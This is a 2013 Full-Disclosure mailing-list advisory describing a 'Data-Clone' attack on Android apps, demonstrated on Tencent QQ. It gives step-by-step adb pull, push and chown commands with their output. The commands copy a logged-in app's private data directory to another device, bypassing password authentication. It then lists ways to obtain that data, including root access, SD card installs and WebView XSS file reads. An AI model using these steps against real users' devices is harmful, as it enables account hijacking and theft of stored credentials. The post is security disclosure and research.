| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CALDoU3_R=x_p-RoJA=B1zDtMdmSx1MVXau+bukwuOMjLBs+qOA@mail.gmail.com>
Date: Sun, 17 Mar 2013 18:09:09 +0800
From: IEhrepus <5up3rh3i@...il.com>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: "Data-Clone" -- a new way to attack android apps
"Data-Clone" -- a new way to attack android apps
Author: SuperHei@....knownsec.com [Email:5up3rh3i#gmail.com]
Release Date: 2013/03/16
References: http://www.80vul.com/android/data-clone.txt
Chinese Version:
http://blog.knownsec.com/2013/03/attack-your-android-apps-by-webview/
--[ I - Introduction
This is a new way to attack android apps t,and i call it "Data-Clone
Attack". it can bypass password authentication ,when user login the
app and set "remember password"(some apps is define).
--[ II - Description
let us use a demo to illustrat it , This is a test procedure:
1. open two emulator.
>adb devices
List of devices attached
emulator-5554 device
emulator-5556 device
both devices install
"com.tencent.mobileqq"(https://play.google.com/store/search?q=com.tencent.mobileqq&c=apps),Ofcourse,
you also can use other applications to test.
2. login the app on "emulator-5554" and make sure you choose the
"remember password".
then pull the app data to your PC
>adb -s emulator-5554 pull /data/data/com.tencent.mobileqq/ d:\\aab
pull: building file list...
pull: /data/data/com.tencent.mobileqq/databases/qcenter.Db ->
d:\\aab/databases/qcenter.Db
pull: /data/data/com.tencent.mobileqq/databases/*************.db ->
d:\\aab/databases/*************.db
pull: /data/data/com.tencent.mobileqq/shared_prefs/only.xml ->
d:\\aab/shared_prefs/only.xml
pull: /data/data/com.tencent.mobileqq/shared_prefs/share.xml ->
d:\\aab/shared_prefs/share.xml
pull: /data/data/com.tencent.mobileqq/shared_prefs/com.tencent.mobileqq_preferences.xml
-> d:\\aab/shared_prefs/com.tencent.mobileqq_preferences.xml
pull: /data/data/com.tencent.mobileqq/shared_prefs/mobileQQ.xml ->
d:\\aab/shared_prefs/mobileQQ.xml
pull: /data/data/com.tencent.mobileqq/shared_prefs/*************.xml
-> d:\\aab/shared_prefs/*************.xml
pull: /data/data/com.tencent.mobileqq/files/ADPic/457 -> d:\\aab/files/ADPic/457
pull: /data/data/com.tencent.mobileqq/files/Skin/skinmain.xml ->
d:\\aab/files/Skin/skinmain.xml
pull: /data/data/com.tencent.mobileqq/files/Skin/tab_bg_bar.png ->
d:\\aab/files/Skin/tab_bg_bar.png
pull: /data/data/com.tencent.mobileqq/files/Skin/thumbnail_skin.xml ->
d:\\aab/files/Skin/thumbnail_skin.xml
pull: /data/data/com.tencent.mobileqq/files/Skin/title_bg_bar.png ->
d:\\aab/files/Skin/title_bg_bar.png
pull: /data/data/com.tencent.mobileqq/files/sc/ConfigStore2.dat ->
d:\\aab/files/sc/ConfigStore2.dat
pull: /data/data/com.tencent.mobileqq/files/ConfigStore2.dat ->
d:\\aab/files/ConfigStore2.dat
pull: /data/data/com.tencent.mobileqq/files/runningApp ->
d:\\aab/files/runningApp
pull: /data/data/com.tencent.mobileqq/lib/libamrnb.so -> d:\\aab/lib/libamrnb.so
pull: /data/data/com.tencent.mobileqq/lib/libaudiohelper.so ->
d:\\aab/lib/libaudiohelper.so
pull: /data/data/com.tencent.mobileqq/lib/libcodecwrapper.so ->
d:\\aab/lib/libcodecwrapper.so
pull: /data/data/com.tencent.mobileqq/lib/libCommon.so ->
d:\\aab/lib/libCommon.so
pull: /data/data/com.tencent.mobileqq/lib/liblbs.so -> d:\\aab/lib/liblbs.so
pull: /data/data/com.tencent.mobileqq/lib/libmsfboot.so ->
d:\\aab/lib/libmsfboot.so
pull: /data/data/com.tencent.mobileqq/lib/libsnapcore.so ->
d:\\aab/lib/libsnapcore.so
pull: /data/data/com.tencent.mobileqq/lib/libVideoCtrl.so ->
d:\\aab/lib/libVideoCtrl.so
23 files pulled. 0 files skipped.
88 KB/s (4431172 bytes in 49.011s)
3. push the data to "emulator-5556"
>adb -s emulator-5556 push D:\\aab /data/data/com.tencent.mobileqq/
push: D:\\aab/databases/qcenter.Db ->
/data/data/com.tencent.mobileqq/databases/qcenter.Db
push: D:\\aab/databases/*************.db ->
/data/data/com.tencent.mobileqq/databases/*************.db
push: D:\\aab/files/ADPic/457 -> /data/data/com.tencent.mobileqq/files/ADPic/457
push: D:\\aab/files/sc/ConfigStore2.dat ->
/data/data/com.tencent.mobileqq/files/sc/ConfigStore2.dat
push: D:\\aab/files/Skin/title_bg_bar.png ->
/data/data/com.tencent.mobileqq/files/Skin/title_bg_bar.png
push: D:\\aab/files/Skin/thumbnail_skin.xml ->
/data/data/com.tencent.mobileqq/files/Skin/thumbnail_skin.xml
push: D:\\aab/files/Skin/tab_bg_bar.png ->
/data/data/com.tencent.mobileqq/files/Skin/tab_bg_bar.png
push: D:\\aab/files/Skin/skinmain.xml ->
/data/data/com.tencent.mobileqq/files/Skin/skinmain.xml
push: D:\\aab/files/runningApp ->
/data/data/com.tencent.mobileqq/files/runningApp
push: D:\\aab/files/ConfigStore2.dat ->
/data/data/com.tencent.mobileqq/files/ConfigStore2.dat
push: D:\\aab/lib/libVideoCtrl.so ->
/data/data/com.tencent.mobileqq/lib/libVideoCtrl.so
push: D:\\aab/lib/libsnapcore.so ->
/data/data/com.tencent.mobileqq/lib/libsnapcore.so
push: D:\\aab/lib/libmsfboot.so ->
/data/data/com.tencent.mobileqq/lib/libmsfboot.so
push: D:\\aab/lib/liblbs.so -> /data/data/com.tencent.mobileqq/lib/liblbs.so
push: D:\\aab/lib/libCommon.so ->
/data/data/com.tencent.mobileqq/lib/libCommon.so
push: D:\\aab/lib/libcodecwrapper.so ->
/data/data/com.tencent.mobileqq/lib/libcodecwrapper.so
push: D:\\aab/lib/libaudiohelper.so ->
/data/data/com.tencent.mobileqq/lib/libaudiohelper.so
push: D:\\aab/lib/libamrnb.so -> /data/data/com.tencent.mobileqq/lib/libamrnb.so
push: D:\\aab/shared_prefs/share.xml ->
/data/data/com.tencent.mobileqq/shared_prefs/share.xml
push: D:\\aab/shared_prefs/only.xml ->
/data/data/com.tencent.mobileqq/shared_prefs/only.xml
push: D:\\aab/shared_prefs/mobileQQ.xml ->
/data/data/com.tencent.mobileqq/shared_prefs/mobileQQ.xml
push: D:\\aab/shared_prefs/com.tencent.mobileqq_preferences.xml ->
/data/data/com.tencent.mobileqq/shared_prefs/com.tencent.mobileqq_preferences.xml
push: D:\\aab/shared_prefs/*************.xml ->
/data/data/com.tencent.mobileqq/shared_prefs/*************.xml
23 files pushed. 0 files skipped.
69 KB/s (4431172 bytes in 62.108s)
4. adb-shell to "emulator-5556"
>adb -s emulator-5556 shell
# ls -l /data/data/
ls -l /data/data/
drwxr-x--x app_1 app_1 2012-09-24 02:43 com.android.htmlviewer
....
drwxr-x--x app_35 app_35 2012-12-06 07:17 com.tencent.mobileqq
and get the com.tencent.mobileqq owner is “app_35”。
Because push the data is ROOT :
# ls -l /data/data/com.tencent.mobileqq
ls -l /data/data/com.tencent.mobileqq
drwxrwxr-x root root 2012-12-06 07:17 shared_prefs
drwxrwxr-x root root 2012-12-06 07:16 databases
drwxrwx--x app_35 app_35 2012-12-06 07:10 cache
drwxrwx--x app_35 app_35 2012-12-06 07:16 files
drwxr-xr-x system system 2012-12-06 07:17 lib
so we need to chown :
# cd /data/data/com.tencent.mobileqq
cd /data/data/com.tencent.mobileqq
# chown app_35 *
chown app_35 *
# ls -l
ls -l
drwxrwxr-x app_35 root 2012-12-06 07:17 shared_prefs
drwxrwxr-x app_35 root 2012-12-06 07:16 databases
drwxrwx--x app_35 app_35 2012-12-06 07:10 cache
drwxrwx--x app_35 app_35 2012-12-06 07:16 files
drwxr-xr-x app_35 system 2012-12-06 07:17 lib
5.open the app on "emulator-5556", and u have login the
com.tencent.mobileqq on "emulator-5556".
--[ III - How to exploit
"How to get the contents of data" is key to the completion of the
attack. some like this:
1. Already have super privileges
under the root shell like the demo,u can bypass password
authentication used "Data-Clone Attack".
2. apps install on SDcard
the others have read permissions to obtain the app's data.
3. Cross-site scripting on android
app + webview + xss(or webkit xcs vul) = "Data-Clone"
On older version of android , android app's xss or webkit xcs vul can
read the loacl file's contents :
http://www.80vul.com/android/android-0days.txt
So the app's webview have the file read permissions to the app's data.
when a app user visit a URL link,the data will Be cloned。
--[ IV - Disclosure Timeline
2012/03/ - Found this
2012/12/10 - Report it to security@...roid.com
......For a long time has passed......
2013/03/16 - security@...roid.com do not have any response
(maybe,because Google was not andriod's biological mother)
2013/03/16 -Public Disclosure
hitest
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists